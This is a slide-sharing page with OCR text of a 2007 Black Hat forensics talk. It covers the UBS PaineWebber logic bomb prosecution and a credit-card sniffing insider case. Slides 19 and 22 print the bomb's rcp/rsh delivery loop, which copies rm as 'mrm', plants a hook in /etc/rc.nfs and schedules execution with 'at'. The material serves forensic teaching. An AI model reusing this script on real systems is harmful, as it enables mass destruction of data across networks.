sm oke em out
play

Sm oke em Out Black Hat Las Vegas 2 0 0 7 Rohyt Belani Keith - PowerPoint PPT Presentation

Sep 01, 2023 •173 likes •912 views

Sm oke em Out Black Hat Las Vegas 2 0 0 7 Rohyt Belani Keith Jones Intrepidus Group Information security consulting company Services include: Application Security Network Security Mobile Security Located in

  1. Sm oke ‘em Out Black Hat Las Vegas 2 0 0 7 Rohyt Belani Keith Jones

  2. Intrepidus Group � Information security consulting company � Services include: � Application Security � Network Security � Mobile Security � Located in Chantilly, VA & NYC � Internationally acclaimed experts: � Presented at Black Hat, DefCon, Hack In The Box, OWASP � Written articles for SecurityFocus, SC Magazine � Quoted in Forbes, InformationWeek, Hacker Japan, BBC UK, Industry Week, OptimizeMag 2

  3. Jones, Rose, Dykstra and Associates � Founded in January 2007 � We specialize in: � e-Discovery Services � Incident Response � Government Services � Computer Security Training � Located in Columbia, MD 3

  4. Insider “Hacks”: Investigation Challenges � Hacker has deep system knowledge � Minimal footprint of attack � No port scanning activity � Logs may be altered or deleted � Little to no evidence of a “break in” � Hacker may be “in” on the investigation! 4

  5. United States v/ s Roger Duronio

  6. Overview � The Victim : UBS PaineWebber (UBS-PW) � The Defendant : Roger Duronio � The Crim e : � November 2001 – March 4, 2002 � A Logic Bomb on over 1,000 UBS-PW Computer Systems Deleted the File System on March 4, 2002 at 9: 30AM � The Loss: � $3,146,289 Spent on Clean Up Efforts 6

  7. The Defendant � Roger Duronio � Unix Systems Administrator for UBS-PW � Received less in yearly bonuses than he anticipated � Bought UBS PUT Options due to Expire in Mid March, 2002 � Makes money if the stock loses value 7

  8. The Investigation � March 4, 2002 through July 2006 � U.S. Secret Service, Special Agent O’Neil, Lead Investigator, Morristown, NJ � U.S. Assistant Attorneys Mauro Wolfe and V. Grady O’Malley, Newark, NJ � Keith J. Jones, Computer Forensic and Computer Security Expert Witness for the Government 8

  9. The Indictment 1. Securities Fraud 2. Computer Use During the Fraud 3. Mail Fraud # 1 4. Mail Fraud # 2 9

  10. The Evidence � 20 Backup Tapes from Relevant Servers � AIX � Solaris � VPN Logs � 1 @Stake Report from the Initial Response � 70+ Tapes from the Affected Branch Servers � 16 Analyzed � 4 EnCase Images of Duronio’s Home Computer Systems � 1 Hard Copy of the Logic Bomb found on Duronio’s Bedroom Dresser 10

  11. Logic Bomb Components � Trigger Mechanism � Payload � Delivery Mechanism � Persistence Mechanism 11

  12. Trigger Mechanism � The Trigger Runs Continuously and Waits for an Event. Once the Event Occurs, the Trigger Executes the Logic Bomb’s Payload. 12

  13. Sleep N Is it March, 864,000 April, or May? Seconds (10 Days) Y Sleep N 86,400 Is it Monday? Seconds (1 Day) Y N Is it later or Sleep 3600 equal to Seconds 9:00 AM? (1 Hour) Y N Is it later or Sleep 60 equal to Seconds 9:30 AM? (1 Minute) Y 13 Delete Every File

  14. Sleep N Is it March, 864,000 April, or May? Seconds (10 Days) Y Sleep N 86,400 Is it Monday? Seconds (1 Day) Y “RPC.LOGD” was Discovered on N Is it later or Sleep 3600 the SA Host. The Original equal to Seconds Source Code Name Was 9:00 AM? (1 Hour) “wait_tst.c” Y N Is it later or Sleep 60 equal to Seconds 9:30 AM? (1 Minute) Y 14 Delete Every File

  15. Logic Bomb Components � Trigger Mechanism � Payload � Delivery Mechanism � Persistence Mechanism 15

  16. Payload � The Payload of a Logic Bomb was the Unix Remove (“rm”) Command Disguised as “mrm”. Exhibit 721 16

  17. Logic Bomb Components � Trigger Mechanism � Payload � Delivery Mechanism � Persistence Mechanism 17

  18. Delivery Mechanism � A Delivery Mechanism is Used to Distribute and Install a Logic Bomb on Multiple Remote Computers Nationwide. 18

  19. Delivery Mechanism Delivers RSH_SCAN2.KSH Trigger for i in `cat ll_l` do Delivers Persistence rcp /usr/sbin/rpc.logd $i:/usr/sbin/rpc.logd Mechanism rcp /usr/sbin/rpc.logd $i:/usr/sbin/syschg rcp llines $i:/tmp/llines rsh $i 'cat /etc/rc.nfs /tmp/llines >/tmp/rc.nfs' Creates the Payload rsh $i mv /tmp/rc.nfs /etc/rc.nfs rsh $i cp /usr/bin/rm /usr/sbin/mrm rsh $i "nohup /usr/sbin/rpc.logd </dev/null >/dev/null 2>&1 &" rsh $i 'echo /usr/bin/syschg | at -t 200203010930' done exit Installs Logic Bomb, Twice 19

  20. Logic Bomb Components � Trigger Mechanism � Payload � Delivery Mechanism � Persistence Mechanism 20

  21. Persistence Mechanism � A Persistence Mechanism Assures that a Logic Bomb Always Executes Upon Restart. 21

  22. Persistence Mechanism if [ -x /usr/sbin/rpc.logd ]; then start rpc.logd /usr/sbin/rpc.logd fi The Persistence Mechanism is Hidden in the RC.NFS Startup Script. 22

  23. 23 W hat Did W e Find?

  24. WTMP Logs SU Logs UBS PaineWebber Employee’s Residence UBS PaineWebber Verizon Session Logs VPN Logs ` User: re01645 Password: ****** ICSDEV02 24

  25. Verizon Session Logs � Username � User’s Home IP Address � Start of Session � End of Session � User Home Address 25

  26. User’s Home Address and Telephone Number Start Time (8:24 AM) End Time (11:08 PM) Username User’s Home IP 26 Address

  27. VPN Logs � Connection Time � UBS PaineWebber Employee’s Username � UBS PaineWebber Employee’s Home IP Address � UBS PaineWebber Server IP Address 27

  28. DEV02 DEV02 UBS Connection UBS UBS PaineWebber’s Time PaineWebber PaineWebber Server IP (1:29 AM) Employee’s Employee’s Address Username Home IP Address 28 28

  29. WTMP Logs � Username � Source IP Address � Session Start Time � Session End Time � Session Time Length 29

  30. dev02 The VPN Gateway The VPN Gateway rduronio successfully logs into the SA Host from DEV02 from 3:40 PM through 3:43 PM rduronio successfully logs into the SA Host from the VPN Gateway from 3:08 PM through 3:47 PM 30 30

  31. Switch User (SU) Logs � Time of Switch � Original Username � Resulting Username 31

  32. 32 Resulting Username 32 Username Original (3:09 PM) Time of Switch

  33. Expert Conclusions 1. The Forensic Examination Revealed the Existence of the Trigger Mechanism of a Logic Bomb on Two of Roger Duronio’s Home Computers (the “Duronio Trigger”). The Duronio Trigger Would Cause a Logic Bomb to Delete all Files on a Computer at 9: 30 a.m. on Monday, March 4, 2002, and at 9: 30 a.m. every Monday in March, April, and May 2002. 33

  34. Expert Conclusions 2. The Forensic Examination Revealed that a Logic Bomb, Containing the Duronio Trigger, was Distributed and Intentionally Installed on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network. 34

  35. Expert Conclusions 3. The Forensic Examination Revealed that at 9: 30 a.m. on Monday, March 4, 2002, the Logic Bomb Executed and Began Deleting Every File on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network. 35

  36. Expert Conclusions 4. The Forensic Examination Revealed that Roger Duronio’s Usernames and Home Computers were Directly Linked to the Creation, Modification, Distribution, Installation, and Execution of the Logic Bomb on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network. 36

  37. The Verdict? 1. Securities Fraud � GUILTY 2. Computer Use During the Fraud � GUILTY 3. Mail Fraud # 1 � NOT GUILTY 4. Mail Fraud # 2 � NOT GUILTY 37

  38. The Sentence? � Roger Duronio was sentenced to 97 months in jail, which was the maximum he could receive 38

  39. The Phantom I nsider

  40. Symptoms � An employee of a retail company, on the corporate network cannot access e-mail � The IT guy finds the following: � Unable to ping the mail server from the employee’s workstation � Virtual network adapter with IP address 10.8.0.5 � Ethernet address is 10.1.0.205 � Mail server IP: 10.8.0.2 40

  41. Deeper Investigation � OpenVPN service running on the machine � Spurious connections to the outside world 41

  42. Deeper Investigation � Running “net use” shows that the C$ share of a server in the credit processing network has been successfully mapped � Netbios connections from the store network 42

  43. Deeper Investigation � Firewall rule-set honing efforts under way � Extensive logging enabled on both: � Store to Corporate Network Firewall � Corporate Network to Credit Processing Network Firewall � No port scanning activity! � Connections from victim to 1 of 3 credit card processing servers visible 43

  44. Time Out � What do we know so far? � Attack originated from a store network � Compromised an employee workstation � Netbios connection established to victim workstation � Workstation has OpenVPN connection to IP address in a foreign country � Workstation also established connection to a credit card processing server 44

  45. Investigation Continues… � What did the attacker do on the credit card processing server? � Sniffed on specific TCP ports related to a specific credit processing system � Captured credit transactions in transit and stored them on flat files � Transferred flat files to victim workstation for transmission via the OpenVPN connection to the outside world 45

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Strategies to Drive Continued Growth Lowell McAdam President &amp; CEO, Verizon Wireless John

Strategies to Drive Continued Growth Lowell McAdam President &amp; CEO, Verizon Wireless John

Strategies to Drive Continued Growth Lowell McAdam President &amp; CEO, Verizon Wireless John Killian EVP &amp; CFO, Verizon January 15, 2010 Safe Harbor Statement NOTE: This presentation contains statements about expected future

334 views • 8 slides
for Telecom Turn-key solution for home media Wireless interactive services for smart media and

for Telecom Turn-key solution for home media Wireless interactive services for smart media and

Media Network Solutions for Telecom Turn-key solution for home media Wireless interactive services for smart media and entertainment environment sharing, streaming, control of video, photo, audio, TV content within the home network Arkuda

855 views • 16 slides
MATTITUCK-CUTCHOGUE U.F.S.D. Central Administrative Offices Preliminary Smart Schools Investment

MATTITUCK-CUTCHOGUE U.F.S.D. Central Administrative Offices Preliminary Smart Schools Investment

D R . A NNE H. S MITH M ICHAEL E NGELHARDT Superintendent of Schools Business Manager T RICIA D ESIDERIO G ERALDINE D OHERTY Director of Special Education Director of Technology MATTITUCK-CUTCHOGUE U.F.S.D. Central Administrative Offices

176 views • 4 slides
70/80 GHz for 5G Backhaul March 2020 Agenda 2 5G Network Trends and Densification E-Band

70/80 GHz for 5G Backhaul March 2020 Agenda 2 5G Network Trends and Densification E-Band

1 70/80 GHz for 5G Backhaul March 2020 Agenda 2 5G Network Trends and Densification E-Band Technology Evolution Proposed Rule Change to Permit Smaller Antennas: Antenna Gain Additional Rule Change (Desired but Not Required):

904 views • 24 slides
Wireless Network Information Theory L-L. Xie and P. R. Kumar Dept. of Electrical and Computer

Wireless Network Information Theory L-L. Xie and P. R. Kumar Dept. of Electrical and Computer

Wireless Network Information Theory L-L. Xie and P. R. Kumar Dept. of Electrical and Computer Engineering, and Coordinated Science Lab University of Illinois, Urbana-Champaign Email prkumar@uiuc.edu DIMACS Workshop on Network Information

528 views • 51 slides
Knowledge Kejing Liu, Stephan Bohacek, and Javier Garcia-Frias Department of Electrical and

Knowledge Kejing Liu, Stephan Bohacek, and Javier Garcia-Frias Department of Electrical and

Interference Mitigating in Wireless Networks Using Prior Knowledge Kejing Liu, Stephan Bohacek, and Javier Garcia-Frias Department of Electrical and Computer Engineering University of Delaware Annual Conference on Information Science and System

244 views • 22 slides
SOCRATES Self-Optimisation and Self-Configuration in Wireless Networks www.fp7-socrates.eu

SOCRATES Self-Optimisation and Self-Configuration in Wireless Networks www.fp7-socrates.eu

SOCRATES Self-Optimisation and Self-Configuration in Wireless Networks www.fp7-socrates.eu Outline SOCRATES overview Initial progress Use cases Requirements Assessment criteria Interactions and parameter groups

556 views • 20 slides
Wireless Network (Neutral Host) Request for Proposals Update Presented to the Riders

Wireless Network (Neutral Host) Request for Proposals Update Presented to the Riders

Wireless Network (Neutral Host) Request for Proposals Update Presented to the Riders Advisory Council March 5, 2008 1 Metros vision for future wireless services Project Build a comprehensive wireless network (Neutral Host) to

463 views • 4 slides
Electronic Spying and Tracking Spouses in Divorce: Admissibility and Privacy Issues Navigating

Electronic Spying and Tracking Spouses in Divorce: Admissibility and Privacy Issues Navigating

Presenting a live 90-minute webinar with interactive Q&amp;A Electronic Spying and Tracking Spouses in Divorce: Admissibility and Privacy Issues Navigating Evidentiary Issues With Spyware, GPS Trackers, Cell Phone Forensics, Wiretaps, Social

1.09k views • 107 slides
INFORMATION SHARING (The role, if any, of s.8 of the Charter) By: Michael Fawcett Crown

INFORMATION SHARING (The role, if any, of s.8 of the Charter) By: Michael Fawcett Crown

INFORMATION SHARING (The role, if any, of s.8 of the Charter) By: Michael Fawcett Crown Counsel Crown Law Office Criminal Michael Lacy Brauti Thorning Zibarras LLP WHAT IS INFORMATION SHARING? Information sharing means the

912 views • 38 slides
GOOD PRACTICES IN MUTUAL LEGAL ASSISTANCE EUROPEAN JUDICIAL TRAINING NETWORK BARCELONA

GOOD PRACTICES IN MUTUAL LEGAL ASSISTANCE EUROPEAN JUDICIAL TRAINING NETWORK BARCELONA

CROSS BORDER GATHERING EVIDENCE GOOD PRACTICES IN MUTUAL LEGAL ASSISTANCE EUROPEAN JUDICIAL TRAINING NETWORK BARCELONA SEMINAR, 29-30 SEPTEMBER 2016 JORGE COSTA PORTUGAL (This presentation was elaborated with the contributions made by

373 views • 20 slides
Ca se Bud g e ting : Stra te g ie s fo r Pla nning a nd F und ing L itig a tio n in Ca pita

Ca se Bud g e ting : Stra te g ie s fo r Pla nning a nd F und ing L itig a tio n in Ca pita

Ca se Bud g e ting : Stra te g ie s fo r Pla nning a nd F und ing L itig a tio n in Ca pita l a nd Me g a -Ca se s 2016 CL E NORT HE RN AND SOUT HE RN DIST RICT S OF MISSISSIPPI DE CE MBE R 9, 2016 BIL OXI, MISSISSIPPI

516 views • 33 slides
&quot;Boomerang routing Visualizing Canada/US cross-border traffic and surveillance Andrew

&quot;Boomerang routing Visualizing Canada/US cross-border traffic and surveillance Andrew

&quot;Boomerang routing Visualizing Canada/US cross-border traffic and surveillance Andrew Clement CloudLaw Conference with Steve Harvey, Yannet Lathrop, Colin McCann, Nancy Law and Policy in the Cloud Paterson, ** David Phillips, Gabby Resch

279 views • 27 slides
EASM 2014 media sources, and interviews with informed actors from the realm of Greek football. In

EASM 2014 media sources, and interviews with informed actors from the realm of Greek football. In

THE ONLY GAME IN TOWN?: MATCH-FIXING IN GREECE Submitting author: Miss Elisavet Argyro Manoli Teesside University, Business School Middlesbrough, TS1 3BA United Kingdom All authors: Elisavet Argyro Manoli (corresp), Georgios Antonopoulos

246 views • 3 slides
What is going on in Hungary? Direct democracy in a weird political environment Madarsz Csaba -

What is going on in Hungary? Direct democracy in a weird political environment Madarsz Csaba -

Summer Academy 2012 July ,Burgas What is going on in Hungary? Direct democracy in a weird political environment Madarsz Csaba - Hungary Summer Academy 2012 July ,Burgas The signs of change are obvious. A different understanding of

811 views • 21 slides
Data Privacy Data Privacy Salam Yamout Yamout Salam Women in Information Technology (WIT)

Data Privacy Data Privacy Salam Yamout Yamout Salam Women in Information Technology (WIT)

Data Privacy Data Privacy Salam Yamout Yamout Salam Women in Information Technology (WIT) Women in Information Technology (WIT) Cybercrime Forum 23 Forum 23- -24 February 2006 24 February 2006 Cybercrime Movenpick Hotel, Beirut, Lebanon

232 views • 8 slides
Pennsylvania July 25, 2013, Brisbane, Australia Traditionally, American utilities were well

Pennsylvania July 25, 2013, Brisbane, Australia Traditionally, American utilities were well

Sonny Popowsky, Former Consumer Advocate of Pennsylvania July 25, 2013, Brisbane, Australia Traditionally, American utilities were well represented in regulatory proceedings by attorneys, utility officials, and expert witnesses who were able

363 views • 33 slides
Lessons for IROs from the 2016 Election and What to Expect in 2017 Election 2016 2 Results:

Lessons for IROs from the 2016 Election and What to Expect in 2017 Election 2016 2 Results:

David Castagnetti March 10, 2017 Lessons for IROs from the 2016 Election and What to Expect in 2017 Election 2016 2 Results: Big Night for the GOP 306 306 Candidate Popular Vote Percent 46.1% TRUMP 62,979,636 48.2% CLINTON

395 views • 35 slides
Working with a Presentation

Working with a Presentation

V-2.1 LESSON 2 Working with a Presentation Create a new presentation using a design

388 views • 13 slides
HowTo: Calculate Evaluation Curves in Presentation Load all measurements you want to use into

HowTo: Calculate Evaluation Curves in Presentation Load all measurements you want to use into

HowTo: Calculate Evaluation Curves in Presentation Load all measurements you want to use into Presentation and display all curves for which you want to calculate the standard deviation (in order to load them into memory). Then, in the Control

280 views • 5 slides
Screen 1 Go to www.myenroll.com Enter your personal User ID and Password &lt; Click Request User ID

Screen 1 Go to www.myenroll.com Enter your personal User ID and Password &lt; Click Request User ID

Online Enrollment Wizard Screen 1 Go to www.myenroll.com Enter your personal User ID and Password &lt; Click Request User ID and Password&gt; Online Enrollment Wizard Screen 2 Personal Information &lt; Click Begin Your Enrollment&gt; Online

626 views • 16 slides
Documentation Training Import Wizard and Loading Data Joo Oliveira, Jos Maria Lima, Snia

Documentation Training Import Wizard and Loading Data Joo Oliveira, Jos Maria Lima, Snia

GRIN-Global/GRIP Genetic Resources Information Platform - Documentation Training Import Wizard and Loading Data Joo Oliveira, Jos Maria Lima, Snia Dias Muscat 31 May 10 Jun 2015 Overview Preparing Data Main steps Error Handling

646 views • 21 slides
TARA Systems

TARA Systems

TARA Systems Workshops Platform Integration Architecture Training Technical

329 views • 30 slides
MANUAL NEW HIRE PROCESS ENROLL NEW EMPLOYEES IN ONE SIMPLE PROCESS. This feature allows manual

MANUAL NEW HIRE PROCESS ENROLL NEW EMPLOYEES IN ONE SIMPLE PROCESS. This feature allows manual

MANUAL NEW HIRE PROCESS ENROLL NEW EMPLOYEES IN ONE SIMPLE PROCESS. This feature allows manual entry of the demographic record and contract record within one function for newly hired employees. Utilizing this feature will save you time by

147 views • 14 slides

More recommend